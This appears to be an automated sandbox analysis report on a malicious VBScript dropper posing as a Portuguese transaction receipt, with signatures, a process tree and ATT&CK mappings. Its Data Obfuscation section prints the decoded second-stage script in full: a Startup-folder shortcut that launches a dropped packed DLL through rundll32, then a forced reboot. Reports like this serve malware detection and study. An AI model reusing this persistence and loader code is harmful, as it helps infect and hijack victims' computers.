Loading ...

Play interactive tourEdit tour

Analysis Report Anexo-comprovativo-de-transaccao-N-jf5h3az8xc6-DOC-469.vbs

Overview

General Information

Sample Name:Anexo-comprovativo-de-transaccao-N-jf5h3az8xc6-DOC-469.vbs
MD5:3fde400fc6c3b401e9e934699907766c
SHA1:59fa542d34f771eb4e1854a834facad18b1f4cec
SHA256:3e018a8015f3f7eda7b3e365696e355a23bf4f85cacbbd770679e3f47ef34006

Most interesting Screenshot:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Detected VMProtect packer
Potential malicious VBS script found (has network functionality)
Uses shutdown.exe to shutdown or reboot the system
Windows Shell Script Host drops VBS files
Abnormal high CPU Usage
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains more sections than normal
PE file contains sections with non-standard names
Stores files to the Windows start menu directory

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 4088 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Anexo-comprovativo-de-transaccao-N-jf5h3az8xc6-DOC-469.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 2348 cmdline: 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Roaming\yceriobfmby.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • cmd.exe (PID: 4880 cmdline: 'C:\Windows\system32\cmd.exe' /c shutdown /r /t 0 /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • shutdown.exe (PID: 3124 cmdline: shutdown /r /t 0 /f MD5: 7A22F98F0B7BAEEF5FE1965F075A5E95)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Networking:

barindex
Potential malicious VBS script found (has network functionality)Show sources
Source: Initial file: .write AfAhzrVQObdwtbt.responseBody
Source: Initial file: .savetofile ZJEisxjDhYWidBT, 2
Source: Initial file: .write RyUBeNIaQfQLihm.responseBody
Source: Initial file: .savetofile iXSQMaJGkdjPzoJ, 2
Source: Joe Sandbox ViewIP Address: 8.8.8.8 8.8.8.8
Source: Joe Sandbox ViewIP Address: 8.8.8.8 8.8.8.8
Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS

System Summary:

barindex
Detected VMProtect packerShow sources
Source: ikqctrlzpdlhcixyi45641149401664.dll.0.drStatic PE information: .vmp0 and .vmp1 section names
Uses shutdown.exe to shutdown or reboot the systemShow sources
Source: unknownProcess created: C:\Windows\System32\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\42753758370875\ikqctrlzpdlhcixyi45641149401664.dll D0B495A0C5EFFFEE00639CEE980BF6E9A0F68DDF732078AF6132EF2228930356
Source: Anexo-comprovativo-de-transaccao-N-jf5h3az8xc6-DOC-469.vbsInitial sample: Strings found which are bigger than 50
Source: ikqctrlzpdlhcixyi45641149401664.dll.0.drStatic PE information: Number of sections : 13 > 10
Source: classification engineClassification label: mal80.rans.evad.winVBS@8/4@0/2
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\42753758370875Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_01
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Anexo-comprovativo-de-transaccao-N-jf5h3az8xc6-DOC-469.vbs'
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Anexo-comprovativo-de-transaccao-N-jf5h3az8xc6-DOC-469.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Roaming\yceriobfmby.vbs
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c shutdown /r /t 0 /f
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Roaming\yceriobfmby.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c shutdown /r /t 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\shutdown.exe shutdown /r /t 0 /fJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Users\user\AppData\Roaming\yceriobfmby.vbs", "true");ITextStream.Write("Private Function FHNoXAfQuyoucjV(OQBBMSfITHUTkpo)");ITextStream.Write("Const oYdCZgXJrzdkjqs = 10");ITextStream.Write("Const WxZdsgiOJluAzIe = 33");ITextStream.Write("Const BzOeQNeUBlLuOlt = 126");ITextStream.Write("If Len(OQBBMSfITHUTkpo) < 5 Then");ITextStream.Write("FHNoXAfQuyoucjV = """);ITextStream.Write("Exit Function");ITextStream.Write("End If");ITextStream.Write("Dim DYTIiRrCaEXbHFU");ITextStream.Write("OQBBMSfITHUTkpo = Mid(OQBBMSfITHUTkpo,3,Len(OQBBMSfITHUTkpo)-4)");ITextStream.Write("For i=2 To Len(OQBBMSfITHUTkpo) Step 2");ITextStream.Write("rvJQIiQcVTjTPlg = Asc(Mid(OQBBMSfITHUTkpo,i,1)) + oYdCZgXJrzdkjqs");ITextStream.Write("If rvJQIiQcVTjTPlg > BzOeQNeUBlLuOlt Then");ITextStream.Write("rvJQIiQcVTjTPlg = rvJQIiQcVTjTPlg - BzOeQNeUBlLuOlt + WxZdsgiOJluAzIe - 1");ITextStream.Write("End If");ITextStream.Write("DYTIiRrCaEXbHFU = DYTIiRrCaEXbHFU & Chr(rvJQIiQcVTjTPlg)");ITextStream.Write("Next");ITextStream.Write("FHNoXAfQuyoucjV = DYTIiRrCaEXbHFU");ITextStream.Write("End Function");ITextStream.Write("Dim PhezsyWTUjntpDv");ITextStream.Write("Set PhezsyWTUjntpDv = Wscript.CreateObject("Wscript.Shell")");ITextStream.Write("QNFxwHBnnsfsuCZ = PhezsyWTUjntpDv.SpecialFolders("StartUp") & "\yceriobfmby"");ITextStream.Write("Set ZnEuOfdeevGHQSV= WScript.CreateObject("WScript.Shell")");ITextStream.Write("Set bnYwXGlvmHYquzJ = ZnEuOfdeevGHQSV.CreateShortcut(QNFxwHBnnsfsuCZ & ".lnk")");ITextStream.Write("bnYwXGlvmHYquzJ.TargetPath = "rundll32"");ITextStream.Write("bnYwXGlvmHYquzJ.Arguments = "C:\Users\user\AppData\Roaming\42753758370875\ikqctrlzpdlhcixyi45641149401664.dll YourGonnaPayMeToday"");ITextStream.Write("bnYwXGlvmHYquzJ.WindowStyle = 1 ");ITextStream.Write("bnYwXGlvmHYquzJ.WorkingDirectory = QNFxwHBnnsfsuCZ");ITextStream.Write("bnYwXGlvmHYquzJ.Save");ITextStream.Write("Dim UziinLJLMfbmsvq ");ITextStream.Write("Set UziinLJLMfbmsvq = CreateObject("WScript.Shell")");ITextStream.Write("WScript.Sleep(30000)");ITextStream.Write("UziinLJLMfbmsvq.Run"%comspec% /c shutdown /r /t 0 /f", , True ");ITextStream.Close();IWshShell3.Run("wscript C:\Users\user\AppData\Roaming\yceriobfmby.vbs")
Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
Source: ikqctrlzpdlhcixyi45641149401664.dll.0.drStatic PE information: section name: .didata
Source: ikqctrlzpdlhcixyi45641149401664.dll.0.drStatic PE information: section name: .vmp0
Source: ikqctrlzpdlhcixyi45641149401664.dll.0.drStatic PE information: section name: .vmp1

Persistence and Installation Behavior:

barindex
Windows Shell Script Host drops VBS filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\yceriobfmby.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\42753758370875\ikqctrlzpdlhcixyi45641149401664.dllJump to dropped file

Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yceriobfmby.lnkJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yceriobfmby.lnkJump to behavior

Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\42753758370875\ikqctrlzpdlhcixyi45641149401664.dllJump to dropped file
Source: shutdown.exe, 0000000C.00000002.1113771765.0000029F0E3D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: shutdown.exe, 0000000C.00000002.1113771765.0000029F0E3D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: shutdown.exe, 0000000C.00000002.1113771765.0000029F0E3D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: shutdown.exe, 0000000C.00000002.1113771765.0000029F0E3D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: ikqctrlzpdlhcixyi45641149401664.dll.0.drJump to dropped file
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 216.58.212.144 187Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Roaming\yceriobfmby.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c shutdown /r /t 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\shutdown.exe shutdown /r /t 0 /fJump to behavior

Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsPowerShell1Startup Items1Startup Items1Masquerading1Credential DumpingSecurity Software Discovery1Application Deployment SoftwareData from Local SystemData CompressedData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Replication Through Removable MediaScripting321Registry Run Keys / Startup Folder2Process Injection111Process Injection111Network SniffingRemote System Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumFallback ChannelsExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExploitation for Client Execution1Accessibility FeaturesPath InterceptionScripting321Input CaptureFile and Directory Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic ProtocolExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information1Credentials in FilesSystem Information Discovery2Logon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.